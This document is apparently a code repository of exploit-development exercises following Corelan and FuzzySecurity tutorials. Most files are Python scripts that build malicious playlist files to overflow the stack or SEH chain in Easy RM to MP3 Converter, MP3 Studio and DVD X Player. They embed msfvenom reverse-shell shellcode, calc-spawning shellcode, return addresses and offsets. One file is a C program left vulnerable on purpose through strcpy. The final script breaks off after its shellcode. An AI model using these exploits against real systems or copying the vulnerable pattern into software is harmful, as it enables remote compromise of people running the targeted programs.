├── Corelan
    ├── 2. Jumpin To Shellcode
    │   ├── 01JMPESP.py
    │   ├── 02CALLESP.py
    │   ├── 03POPRET.py
    │   ├── 04PUSHRET.py
    │   ├── 05JMPREGOFF.py
    │   └── 06CUSTOM.py
    └── 3. SEH Based Exploits
    │   ├── MP3 Studio 1.0 .m3u SEH exploit.py
    │   ├── SEH.cpp
    │   └── SEH.exe
└── FuzzySecurity
    ├── dvdxplayer_SEH_basedexploit.py
    └── dvdxplayer_stackbasedexploit.py


/Corelan/2. Jumpin To Shellcode/01JMPESP.py:
--------------------------------------------------------------------------------
 1 | # Exploit for Easy RM to MP3 Converter 2.7.3.700
 2 | # NOTE: Offsets could be different on your machine
 3 | 
 4 | # msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=127.0.0.1 -f python -b "\x00\x09\x0a" -v sc
 5 | sc =  ""
 6 | sc += "\xb8\xa4\x51\xde\xd3\xd9\xc7\xd9\x74\x24\xf4\x5b\x31"
 7 | sc += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xe7\x5f\x3c"
 8 | sc += "\x26\x1b\xb7\x42\xc9\xe3\x48\x23\x43\x06\x79\x63\x37"
 9 | sc += "\x43\x2a\x53\x33\x01\xc7\x18\x11\xb1\x5c\x6c\xbe\xb6"
10 | sc += "\xd5\xdb\x98\xf9\xe6\x70\xd8\x98\x64\x8b\x0d\x7a\x54"
11 | sc += "\x44\x40\x7b\x91\xb9\xa9\x29\x4a\xb5\x1c\xdd\xff\x83"
12 | sc += "\x9c\x56\xb3\x02\xa5\x8b\x04\x24\x84\x1a\x1e\x7f\x06"
13 | sc += "\x9d\xf3\x0b\x0f\x85\x10\x31\xd9\x3e\xe2\xcd\xd8\x96"
14 | sc += "\x3a\x2d\x76\xd7\xf2\xdc\x86\x10\x34\x3f\xfd\x68\x46"
15 | sc += "\xc2\x06\xaf\x34\x18\x82\x2b\x9e\xeb\x34\x97\x1e\x3f"
16 | sc += "\xa2\x5c\x2c\xf4\xa0\x3a\x31\x0b\x64\x31\x4d\x80\x8b"
17 | sc += "\x95\xc7\xd2\xaf\x31\x83\x81\xce\x60\x69\x67\xee\x72"
18 | sc += "\xd2\xd8\x4a\xf9\xff\x0d\xe7\xa0\x97\xe2\xca\x5a\x68"
19 | sc += "\x6d\x5c\x29\x5a\x32\xf6\xa5\xd6\xbb\xd0\x32\x18\x96"
20 | sc += "\xa5\xac\xe7\x19\xd6\xe5\x23\x4d\x86\x9d\x82\xee\x4d"
21 | sc += "\x5d\x2a\x3b\xc1\x0d\x84\x94\xa2\xfd\x64\x45\x4b\x17"
22 | sc += "\x6b\xba\x6b\x18\xa1\xd3\x06\xe3\x22\xa3\xd6\xeb\xb3"
23 | sc += "\x33\xd5\xeb\xb2\x78\x50\x0d\xde\x6e\x35\x86\x77\x16"
24 | sc += "\x1c\x5c\xe9\xd7\x8a\x19\x29\x53\x39\xde\xe4\x94\x34"
25 | sc += "\xcc\x91\x54\x03\xae\x34\x6a\xb9\xc6\xdb\xf9\x26\x16"
26 | sc += "\x95\xe1\xf0\x41\xf2\xd4\x08\x07\xee\x4f\xa3\x35\xf3"
27 | sc += "\x16\x8c\xfd\x28\xeb\x13\xfc\xbd\x57\x30\xee\x7b\x57"
28 | sc += "\x7c\x5a\xd4\x0e\x2a\x34\x92\xf8\x9c\xee\x4c\x56\x77"
29 | sc += "\x66\x08\x94\x48\xf0\x15\xf1\x3e\x1c\xa7\xac\x06\x23"
30 | sc += "\x08\x39\x8f\x5c\x74\xd9\x70\xb7\x3c\xe9\x3a\x95\x15"
31 | sc += "\x62\xe3\x4c\x24\xef\x14\xbb\x6b\x16\x97\x49\x14\xed"
32 | sc += "\x87\x38\x11\xa9\x0f\xd1\x6b\xa2\xe5\xd5\xd8\xc3\x2f"
33 | 
34 | file = open('mal.m3u', 'w')
35 | 
36 | # JMP ESP in MSRMCcodec02.dll
37 | ret = "\x3a\xf2\xaa\x01"
38 | 
39 | # Different offsets
40 | offsetXPSP3 = 26071
41 | 
42 | # NOP sled is needed as this shellcode might overwrite some parts of itself
43 | content = "A"*offsetXPSP3 + ret + "C" * 4 + "\x90" * 16 + sc
44 | 
45 | file.write(content)
46 | file.close()
47 | 
48 | # Start a listener on 127.0.0.1:443 and load the mal.m3u
49 | 


--------------------------------------------------------------------------------
/Corelan/2. Jumpin To Shellcode/02CALLESP.py:
--------------------------------------------------------------------------------
 1 | # Exploit for Easy RM to MP3 Converter 2.7.3.700
 2 | # NOTE: Offsets could be different on your machine
 3 | 
 4 | # msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=127.0.0.1 -f python -b "\x00\x09\x0a" -v sc
 5 | sc =  ""
 6 | sc += "\xb8\xa4\x51\xde\xd3\xd9\xc7\xd9\x74\x24\xf4\x5b\x31"
 7 | sc += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xe7\x5f\x3c"
 8 | sc += "\x26\x1b\xb7\x42\xc9\xe3\x48\x23\x43\x06\x79\x63\x37"
 9 | sc += "\x43\x2a\x53\x33\x01\xc7\x18\x11\xb1\x5c\x6c\xbe\xb6"
10 | sc += "\xd5\xdb\x98\xf9\xe6\x70\xd8\x98\x64\x8b\x0d\x7a\x54"
11 | sc += "\x44\x40\x7b\x91\xb9\xa9\x29\x4a\xb5\x1c\xdd\xff\x83"
12 | sc += "\x9c\x56\xb3\x02\xa5\x8b\x04\x24\x84\x1a\x1e\x7f\x06"
13 | sc += "\x9d\xf3\x0b\x0f\x85\x10\x31\xd9\x3e\xe2\xcd\xd8\x96"
14 | sc += "\x3a\x2d\x76\xd7\xf2\xdc\x86\x10\x34\x3f\xfd\x68\x46"
15 | sc += "\xc2\x06\xaf\x34\x18\x82\x2b\x9e\xeb\x34\x97\x1e\x3f"
16 | sc += "\xa2\x5c\x2c\xf4\xa0\x3a\x31\x0b\x64\x31\x4d\x80\x8b"
17 | sc += "\x95\xc7\xd2\xaf\x31\x83\x81\xce\x60\x69\x67\xee\x72"
18 | sc += "\xd2\xd8\x4a\xf9\xff\x0d\xe7\xa0\x97\xe2\xca\x5a\x68"
19 | sc += "\x6d\x5c\x29\x5a\x32\xf6\xa5\xd6\xbb\xd0\x32\x18\x96"
20 | sc += "\xa5\xac\xe7\x19\xd6\xe5\x23\x4d\x86\x9d\x82\xee\x4d"
21 | sc += "\x5d\x2a\x3b\xc1\x0d\x84\x94\xa2\xfd\x64\x45\x4b\x17"
22 | sc += "\x6b\xba\x6b\x18\xa1\xd3\x06\xe3\x22\xa3\xd6\xeb\xb3"
23 | sc += "\x33\xd5\xeb\xb2\x78\x50\x0d\xde\x6e\x35\x86\x77\x16"
24 | sc += "\x1c\x5c\xe9\xd7\x8a\x19\x29\x53\x39\xde\xe4\x94\x34"
25 | sc += "\xcc\x91\x54\x03\xae\x34\x6a\xb9\xc6\xdb\xf9\x26\x16"
26 | sc += "\x95\xe1\xf0\x41\xf2\xd4\x08\x07\xee\x4f\xa3\x35\xf3"
27 | sc += "\x16\x8c\xfd\x28\xeb\x13\xfc\xbd\x57\x30\xee\x7b\x57"
28 | sc += "\x7c\x5a\xd4\x0e\x2a\x34\x92\xf8\x9c\xee\x4c\x56\x77"
29 | sc += "\x66\x08\x94\x48\xf0\x15\xf1\x3e\x1c\xa7\xac\x06\x23"
30 | sc += "\x08\x39\x8f\x5c\x74\xd9\x70\xb7\x3c\xe9\x3a\x95\x15"
31 | sc += "\x62\xe3\x4c\x24\xef\x14\xbb\x6b\x16\x97\x49\x14\xed"
32 | sc += "\x87\x38\x11\xa9\x0f\xd1\x6b\xa2\xe5\xd5\xd8\xc3\x2f"
33 | 
34 | file = open('mal.m3u', 'w')
35 | 
36 | # CALL ESP in MSRMCcodec02.dll 
37 | ret = "\x0f\x3f\x98\x01"
38 | 
39 | # Different offsets
40 | offsetXPSP3 = 26071
41 | 
42 | # NOP sled is needed as this shellcode might overwrite some parts of itself
43 | content = "A"*offsetXPSP3 + ret + "C" * 4 + "\x90" * 16 + sc
44 | 
45 | file.write(content)
46 | file.close()
47 | 
48 | # Start a listener on 127.0.0.1:443 and load the mal.m3u
49 | 


--------------------------------------------------------------------------------
/Corelan/2. Jumpin To Shellcode/03POPRET.py:
--------------------------------------------------------------------------------
 1 | # Exploit for Easy RM to MP3 Converter 2.7.3.700
 2 | # NOTE: Offsets could be different on your machine
 3 | 
 4 | # msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=127.0.0.1 -f python -b "\x00\x09\x0a" -v sc
 5 | sc =  ""
 6 | sc += "\xb8\xa4\x51\xde\xd3\xd9\xc7\xd9\x74\x24\xf4\x5b\x31"
 7 | sc += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xe7\x5f\x3c"
 8 | sc += "\x26\x1b\xb7\x42\xc9\xe3\x48\x23\x43\x06\x79\x63\x37"
 9 | sc += "\x43\x2a\x53\x33\x01\xc7\x18\x11\xb1\x5c\x6c\xbe\xb6"
10 | sc += "\xd5\xdb\x98\xf9\xe6\x70\xd8\x98\x64\x8b\x0d\x7a\x54"
11 | sc += "\x44\x40\x7b\x91\xb9\xa9\x29\x4a\xb5\x1c\xdd\xff\x83"
12 | sc += "\x9c\x56\xb3\x02\xa5\x8b\x04\x24\x84\x1a\x1e\x7f\x06"
13 | sc += "\x9d\xf3\x0b\x0f\x85\x10\x31\xd9\x3e\xe2\xcd\xd8\x96"
14 | sc += "\x3a\x2d\x76\xd7\xf2\xdc\x86\x10\x34\x3f\xfd\x68\x46"
15 | sc += "\xc2\x06\xaf\x34\x18\x82\x2b\x9e\xeb\x34\x97\x1e\x3f"
16 | sc += "\xa2\x5c\x2c\xf4\xa0\x3a\x31\x0b\x64\x31\x4d\x80\x8b"
17 | sc += "\x95\xc7\xd2\xaf\x31\x83\x81\xce\x60\x69\x67\xee\x72"
18 | sc += "\xd2\xd8\x4a\xf9\xff\x0d\xe7\xa0\x97\xe2\xca\x5a\x68"
19 | sc += "\x6d\x5c\x29\x5a\x32\xf6\xa5\xd6\xbb\xd0\x32\x18\x96"
20 | sc += "\xa5\xac\xe7\x19\xd6\xe5\x23\x4d\x86\x9d\x82\xee\x4d"
21 | sc += "\x5d\x2a\x3b\xc1\x0d\x84\x94\xa2\xfd\x64\x45\x4b\x17"
22 | sc += "\x6b\xba\x6b\x18\xa1\xd3\x06\xe3\x22\xa3\xd6\xeb\xb3"
23 | sc += "\x33\xd5\xeb\xb2\x78\x50\x0d\xde\x6e\x35\x86\x77\x16"
24 | sc += "\x1c\x5c\xe9\xd7\x8a\x19\x29\x53\x39\xde\xe4\x94\x34"
25 | sc += "\xcc\x91\x54\x03\xae\x34\x6a\xb9\xc6\xdb\xf9\x26\x16"
26 | sc += "\x95\xe1\xf0\x41\xf2\xd4\x08\x07\xee\x4f\xa3\x35\xf3"
27 | sc += "\x16\x8c\xfd\x28\xeb\x13\xfc\xbd\x57\x30\xee\x7b\x57"
28 | sc += "\x7c\x5a\xd4\x0e\x2a\x34\x92\xf8\x9c\xee\x4c\x56\x77"
29 | sc += "\x66\x08\x94\x48\xf0\x15\xf1\x3e\x1c\xa7\xac\x06\x23"
30 | sc += "\x08\x39\x8f\x5c\x74\xd9\x70\xb7\x3c\xe9\x3a\x95\x15"
31 | sc += "\x62\xe3\x4c\x24\xef\x14\xbb\x6b\x16\x97\x49\x14\xed"
32 | sc += "\x87\x38\x11\xa9\x0f\xd1\x6b\xa2\xe5\xd5\xd8\xc3\x2f"
33 | 
34 | file = open('mal.m3u', 'w')
35 | 
36 | # POP RET in MSRMCcodec02
37 | pop_ret = "\x6c\xb4\x99\x01"
38 | 
39 | # JMP ESP in MSRMCcodec02.dll
40 | jmp_esp = "\x3a\xf2\xaa\x01"
41 | 
42 | # Different offsets
43 | offsetXPSP3 = 26071
44 | 
45 | # NOP sled is needed as this shellcode might overwrite some parts of itself
46 | content = "A"*offsetXPSP3 + pop_ret + "C" * 4 + "\xef\xbe\xad\xde" + jmp_esp + "\x90" * 16 + sc
47 | 
48 | file.write(content)
49 | file.close()
50 | 
51 | # Start a listener on 127.0.0.1:443 and load the mal.m3u
52 | 


--------------------------------------------------------------------------------
/Corelan/2. Jumpin To Shellcode/04PUSHRET.py:
--------------------------------------------------------------------------------
 1 | # Exploit for Easy RM to MP3 Converter 2.7.3.700
 2 | # NOTE: Offsets could be different on your machine
 3 | 
 4 | # msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=127.0.0.1 -f python -b "\x00\x09\x0a" -v sc
 5 | sc =  ""
 6 | sc += "\xb8\xa4\x51\xde\xd3\xd9\xc7\xd9\x74\x24\xf4\x5b\x31"
 7 | sc += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xe7\x5f\x3c"
 8 | sc += "\x26\x1b\xb7\x42\xc9\xe3\x48\x23\x43\x06\x79\x63\x37"
 9 | sc += "\x43\x2a\x53\x33\x01\xc7\x18\x11\xb1\x5c\x6c\xbe\xb6"
10 | sc += "\xd5\xdb\x98\xf9\xe6\x70\xd8\x98\x64\x8b\x0d\x7a\x54"
11 | sc += "\x44\x40\x7b\x91\xb9\xa9\x29\x4a\xb5\x1c\xdd\xff\x83"
12 | sc += "\x9c\x56\xb3\x02\xa5\x8b\x04\x24\x84\x1a\x1e\x7f\x06"
13 | sc += "\x9d\xf3\x0b\x0f\x85\x10\x31\xd9\x3e\xe2\xcd\xd8\x96"
14 | sc += "\x3a\x2d\x76\xd7\xf2\xdc\x86\x10\x34\x3f\xfd\x68\x46"
15 | sc += "\xc2\x06\xaf\x34\x18\x82\x2b\x9e\xeb\x34\x97\x1e\x3f"
16 | sc += "\xa2\x5c\x2c\xf4\xa0\x3a\x31\x0b\x64\x31\x4d\x80\x8b"
17 | sc += "\x95\xc7\xd2\xaf\x31\x83\x81\xce\x60\x69\x67\xee\x72"
18 | sc += "\xd2\xd8\x4a\xf9\xff\x0d\xe7\xa0\x97\xe2\xca\x5a\x68"
19 | sc += "\x6d\x5c\x29\x5a\x32\xf6\xa5\xd6\xbb\xd0\x32\x18\x96"
20 | sc += "\xa5\xac\xe7\x19\xd6\xe5\x23\x4d\x86\x9d\x82\xee\x4d"
21 | sc += "\x5d\x2a\x3b\xc1\x0d\x84\x94\xa2\xfd\x64\x45\x4b\x17"
22 | sc += "\x6b\xba\x6b\x18\xa1\xd3\x06\xe3\x22\xa3\xd6\xeb\xb3"
23 | sc += "\x33\xd5\xeb\xb2\x78\x50\x0d\xde\x6e\x35\x86\x77\x16"
24 | sc += "\x1c\x5c\xe9\xd7\x8a\x19\x29\x53\x39\xde\xe4\x94\x34"
25 | sc += "\xcc\x91\x54\x03\xae\x34\x6a\xb9\xc6\xdb\xf9\x26\x16"
26 | sc += "\x95\xe1\xf0\x41\xf2\xd4\x08\x07\xee\x4f\xa3\x35\xf3"
27 | sc += "\x16\x8c\xfd\x28\xeb\x13\xfc\xbd\x57\x30\xee\x7b\x57"
28 | sc += "\x7c\x5a\xd4\x0e\x2a\x34\x92\xf8\x9c\xee\x4c\x56\x77"
29 | sc += "\x66\x08\x94\x48\xf0\x15\xf1\x3e\x1c\xa7\xac\x06\x23"
30 | sc += "\x08\x39\x8f\x5c\x74\xd9\x70\xb7\x3c\xe9\x3a\x95\x15"
31 | sc += "\x62\xe3\x4c\x24\xef\x14\xbb\x6b\x16\x97\x49\x14\xed"
32 | sc += "\x87\x38\x11\xa9\x0f\xd1\x6b\xa2\xe5\xd5\xd8\xc3\x2f"
33 | 
34 | file = open('mal.m3u', 'w')
35 | 
36 | # JMP ESP in MSRMCcodec02.dll
37 | ret = "\x88\x1d\x90\x01"
38 | 
39 | # Different offsets
40 | offsetXPSP3 = 26070
41 | 
42 | # NOP sled is needed as this shellcode might overwrite some parts of itself
43 | content = "A"*offsetXPSP3 + ret + "C" * 4 + "\x90" * 16 + sc
44 | 
45 | file.write(content)
46 | file.close()
47 | 
48 | # Start a listener on 127.0.0.1:443 and load the mal.m3u
49 | 


--------------------------------------------------------------------------------
/Corelan/2. Jumpin To Shellcode/05JMPREGOFF.py:
--------------------------------------------------------------------------------
 1 | # Exploit for Easy RM to MP3 Converter 2.7.3.700
 2 | # NOTE: Offsets could be different on your machine
 3 | 
 4 | # msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=127.0.0.1 -f python -b "\x00\x09\x0a" -v sc
 5 | sc =  ""
 6 | sc += "\xb8\xa4\x51\xde\xd3\xd9\xc7\xd9\x74\x24\xf4\x5b\x31"
 7 | sc += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xe7\x5f\x3c"
 8 | sc += "\x26\x1b\xb7\x42\xc9\xe3\x48\x23\x43\x06\x79\x63\x37"
 9 | sc += "\x43\x2a\x53\x33\x01\xc7\x18\x11\xb1\x5c\x6c\xbe\xb6"
10 | sc += "\xd5\xdb\x98\xf9\xe6\x70\xd8\x98\x64\x8b\x0d\x7a\x54"
11 | sc += "\x44\x40\x7b\x91\xb9\xa9\x29\x4a\xb5\x1c\xdd\xff\x83"
12 | sc += "\x9c\x56\xb3\x02\xa5\x8b\x04\x24\x84\x1a\x1e\x7f\x06"
13 | sc += "\x9d\xf3\x0b\x0f\x85\x10\x31\xd9\x3e\xe2\xcd\xd8\x96"
14 | sc += "\x3a\x2d\x76\xd7\xf2\xdc\x86\x10\x34\x3f\xfd\x68\x46"
15 | sc += "\xc2\x06\xaf\x34\x18\x82\x2b\x9e\xeb\x34\x97\x1e\x3f"
16 | sc += "\xa2\x5c\x2c\xf4\xa0\x3a\x31\x0b\x64\x31\x4d\x80\x8b"
17 | sc += "\x95\xc7\xd2\xaf\x31\x83\x81\xce\x60\x69\x67\xee\x72"
18 | sc += "\xd2\xd8\x4a\xf9\xff\x0d\xe7\xa0\x97\xe2\xca\x5a\x68"
19 | sc += "\x6d\x5c\x29\x5a\x32\xf6\xa5\xd6\xbb\xd0\x32\x18\x96"
20 | sc += "\xa5\xac\xe7\x19\xd6\xe5\x23\x4d\x86\x9d\x82\xee\x4d"
21 | sc += "\x5d\x2a\x3b\xc1\x0d\x84\x94\xa2\xfd\x64\x45\x4b\x17"
22 | sc += "\x6b\xba\x6b\x18\xa1\xd3\x06\xe3\x22\xa3\xd6\xeb\xb3"
23 | sc += "\x33\xd5\xeb\xb2\x78\x50\x0d\xde\x6e\x35\x86\x77\x16"
24 | sc += "\x1c\x5c\xe9\xd7\x8a\x19\x29\x53\x39\xde\xe4\x94\x34"
25 | sc += "\xcc\x91\x54\x03\xae\x34\x6a\xb9\xc6\xdb\xf9\x26\x16"
26 | sc += "\x95\xe1\xf0\x41\xf2\xd4\x08\x07\xee\x4f\xa3\x35\xf3"
27 | sc += "\x16\x8c\xfd\x28\xeb\x13\xfc\xbd\x57\x30\xee\x7b\x57"
28 | sc += "\x7c\x5a\xd4\x0e\x2a\x34\x92\xf8\x9c\xee\x4c\x56\x77"
29 | sc += "\x66\x08\x94\x48\xf0\x15\xf1\x3e\x1c\xa7\xac\x06\x23"
30 | sc += "\x08\x39\x8f\x5c\x74\xd9\x70\xb7\x3c\xe9\x3a\x95\x15"
31 | sc += "\x62\xe3\x4c\x24\xef\x14\xbb\x6b\x16\x97\x49\x14\xed"
32 | sc += "\x87\x38\x11\xa9\x0f\xd1\x6b\xa2\xe5\xd5\xd8\xc3\x2f"
33 | 
34 | file = open('mal.m3u', 'w')
35 | 
36 | # JMP ESP in MSRMCcodec02.dll
37 | ret = "\x88\x1d\x90\x01"
38 | 
39 | # Different offsets
40 | offsetXPSP3 = 26070
41 | 
42 | # NOP sled is needed as this shellcode might overwrite some parts of itself
43 | content = "A"*offsetXPSP3 + ret + "C" * 4 + "\x90" * 16 + sc
44 | 
45 | file.write(content)
46 | file.close()
47 | 
48 | # Start a listener on 127.0.0.1:443 and load the mal.m3u
49 | 


--------------------------------------------------------------------------------
/Corelan/2. Jumpin To Shellcode/06CUSTOM.py:
--------------------------------------------------------------------------------
 1 | # Exploit for Easy RM to MP3 Converter 2.7.3.700
 2 | # NOTE: Offsets could be different on your machine
 3 | 
 4 | # msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=127.0.0.1 -f python -b "\x00\x09\x0a" -v sc
 5 | # Size: 351
 6 | sc =  ""
 7 | sc += "\xb8\xa4\x51\xde\xd3\xd9\xc7\xd9\x74\x24\xf4\x5b\x31"
 8 | sc += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xe7\x5f\x3c"
 9 | sc += "\x26\x1b\xb7\x42\xc9\xe3\x48\x23\x43\x06\x79\x63\x37"
10 | sc += "\x43\x2a\x53\x33\x01\xc7\x18\x11\xb1\x5c\x6c\xbe\xb6"
11 | sc += "\xd5\xdb\x98\xf9\xe6\x70\xd8\x98\x64\x8b\x0d\x7a\x54"
12 | sc += "\x44\x40\x7b\x91\xb9\xa9\x29\x4a\xb5\x1c\xdd\xff\x83"
13 | sc += "\x9c\x56\xb3\x02\xa5\x8b\x04\x24\x84\x1a\x1e\x7f\x06"
14 | sc += "\x9d\xf3\x0b\x0f\x85\x10\x31\xd9\x3e\xe2\xcd\xd8\x96"
15 | sc += "\x3a\x2d\x76\xd7\xf2\xdc\x86\x10\x34\x3f\xfd\x68\x46"
16 | sc += "\xc2\x06\xaf\x34\x18\x82\x2b\x9e\xeb\x34\x97\x1e\x3f"
17 | sc += "\xa2\x5c\x2c\xf4\xa0\x3a\x31\x0b\x64\x31\x4d\x80\x8b"
18 | sc += "\x95\xc7\xd2\xaf\x31\x83\x81\xce\x60\x69\x67\xee\x72"
19 | sc += "\xd2\xd8\x4a\xf9\xff\x0d\xe7\xa0\x97\xe2\xca\x5a\x68"
20 | sc += "\x6d\x5c\x29\x5a\x32\xf6\xa5\xd6\xbb\xd0\x32\x18\x96"
21 | sc += "\xa5\xac\xe7\x19\xd6\xe5\x23\x4d\x86\x9d\x82\xee\x4d"
22 | sc += "\x5d\x2a\x3b\xc1\x0d\x84\x94\xa2\xfd\x64\x45\x4b\x17"
23 | sc += "\x6b\xba\x6b\x18\xa1\xd3\x06\xe3\x22\xa3\xd6\xeb\xb3"
24 | sc += "\x33\xd5\xeb\xb2\x78\x50\x0d\xde\x6e\x35\x86\x77\x16"
25 | sc += "\x1c\x5c\xe9\xd7\x8a\x19\x29\x53\x39\xde\xe4\x94\x34"
26 | sc += "\xcc\x91\x54\x03\xae\x34\x6a\xb9\xc6\xdb\xf9\x26\x16"
27 | sc += "\x95\xe1\xf0\x41\xf2\xd4\x08\x07\xee\x4f\xa3\x35\xf3"
28 | sc += "\x16\x8c\xfd\x28\xeb\x13\xfc\xbd\x57\x30\xee\x7b\x57"
29 | sc += "\x7c\x5a\xd4\x0e\x2a\x34\x92\xf8\x9c\xee\x4c\x56\x77"
30 | sc += "\x66\x08\x94\x48\xf0\x15\xf1\x3e\x1c\xa7\xac\x06\x23"
31 | sc += "\x08\x39\x8f\x5c\x74\xd9\x70\xb7\x3c\xe9\x3a\x95\x15"
32 | sc += "\x62\xe3\x4c\x24\xef\x14\xbb\x6b\x16\x97\x49\x14\xed"
33 | sc += "\x87\x38\x11\xa9\x0f\xd1\x6b\xa2\xe5\xd5\xd8\xc3\x2f"
34 | 
35 | file = open('mal.m3u', 'w')
36 | 
37 | # JMP ESP in MSRMCcodec02.dll
38 | ret = "\x3a\xf2\xaa\x01"
39 | 
40 | # Different offsets
41 | offsetXPSP3 = 26070
42 | 
43 | # NOP sled is needed as this shellcode might overwrite some parts of itself
44 | # Imagine buffer space is only 54, buffer somewhere starts again at ESP + 261
45 | availablebuffer = 54
46 | random_offset = 230
47 | content = "A" * 261 + "\x90" * 16 + sc + "A"*(26070-261-16-351) + ret + "CCCC" + "\x83\xc4\x60\x83\xc4\x60\x83\xc4\x60\xff\xe4" + "X"*(availablebuffer - 11) + "\xaa" * random_offset
48 | 
49 | file.write(content)
50 | file.close()
51 | 
52 | # Start a listener on 127.0.0.1:443 and load the mal.m3u
53 | 


--------------------------------------------------------------------------------
/Corelan/3. SEH Based Exploits/MP3 Studio 1.0 .m3u SEH exploit.py:
--------------------------------------------------------------------------------
 1 | # Product name: MP3 Studio 1.0
 2 | # Exploit type: SEH based exploit
 3 | # Author: Abatchy
 4 | 
 5 | f = open('C:\Documents and Settings\\abatchy\Desktop\\b.m3u', "w")
 6 | 
 7 | # Spawn calc.exe
 8 | sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
 9 | "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
10 | "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
11 | "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
12 | "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
13 | "\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37"
14 | "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
15 | "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
16 | "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
17 | "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
18 | "\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
19 | "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
20 | "\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48"
21 | "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43"
22 | "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57"
23 | "\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
24 | "\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
25 | "\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53"
26 | "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
27 | "\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49"
28 | "\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
29 | "\x4e\x36\x43\x46\x42\x50\x5a")
30 | 
31 | # JMP $+30
32 | jmpcode = "\xcc\xeb\x1e\x90"
33 | 
34 | # POP POP RET in xaudio.dll
35 | poppopret = "\xef\xae\x01\x10"
36 | 
37 | data2 = "http://" + "A" * 4103 + jmpcode + poppopret + "\x90"*(46) + sc + "\x90"*500
38 | f.write(data2)
39 | f.close()
40 | 


--------------------------------------------------------------------------------
/Corelan/3. SEH Based Exploits/SEH.cpp:
--------------------------------------------------------------------------------
 1 | #define _CRT_SECURE_NO_WARNINGS
 2 | 
 3 | #include<stdio.h>
 4 | #include<string.h>
 5 | #include<Windows.h>
 6 | 
 7 | int ExceptionHandler(void);
 8 | int main(int argc, char *argv[]) {
 9 | 
10 | 	char temp[512];
11 | 
12 | 	printf("Application launched");
13 | 
14 | 	__try {
15 | 
16 | 		strcpy(temp, argv[1]);
17 | 
18 | 	}
19 | 	__except (ExceptionHandler()) {
20 | 	}
21 | 	return 0;
22 | }
23 | int ExceptionHandler(void) {
24 | 	printf("Exception");
25 | 	return 0;
26 | }


--------------------------------------------------------------------------------
/Corelan/3. SEH Based Exploits/SEH.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abatchy17/ExploitDevSnippets/9c60e804245cf36ceae9f5c167cab4935093b5d7/Corelan/3. SEH Based Exploits/SEH.exe


--------------------------------------------------------------------------------
/FuzzySecurity/dvdxplayer_SEH_basedexploit.py:
--------------------------------------------------------------------------------
 1 | # Product name: DVD X Player 5.5 Professional
 2 | # Exploit type: SEH based exploit
 3 | # Author: Abatchy
 4 | 
 5 | #!/usr/bin/python -w
 6 |   
 7 | filename="evil.plf"
 8 | 
 9 | sc = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
10 | "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
11 | "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
12 | "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
13 | "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
14 | "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
15 | "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
16 | "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
17 | "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
18 | "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
19 | "\x7f\xe8\x7b\xca")
20 | 
21 | # POP POP RET found in EPG.dll
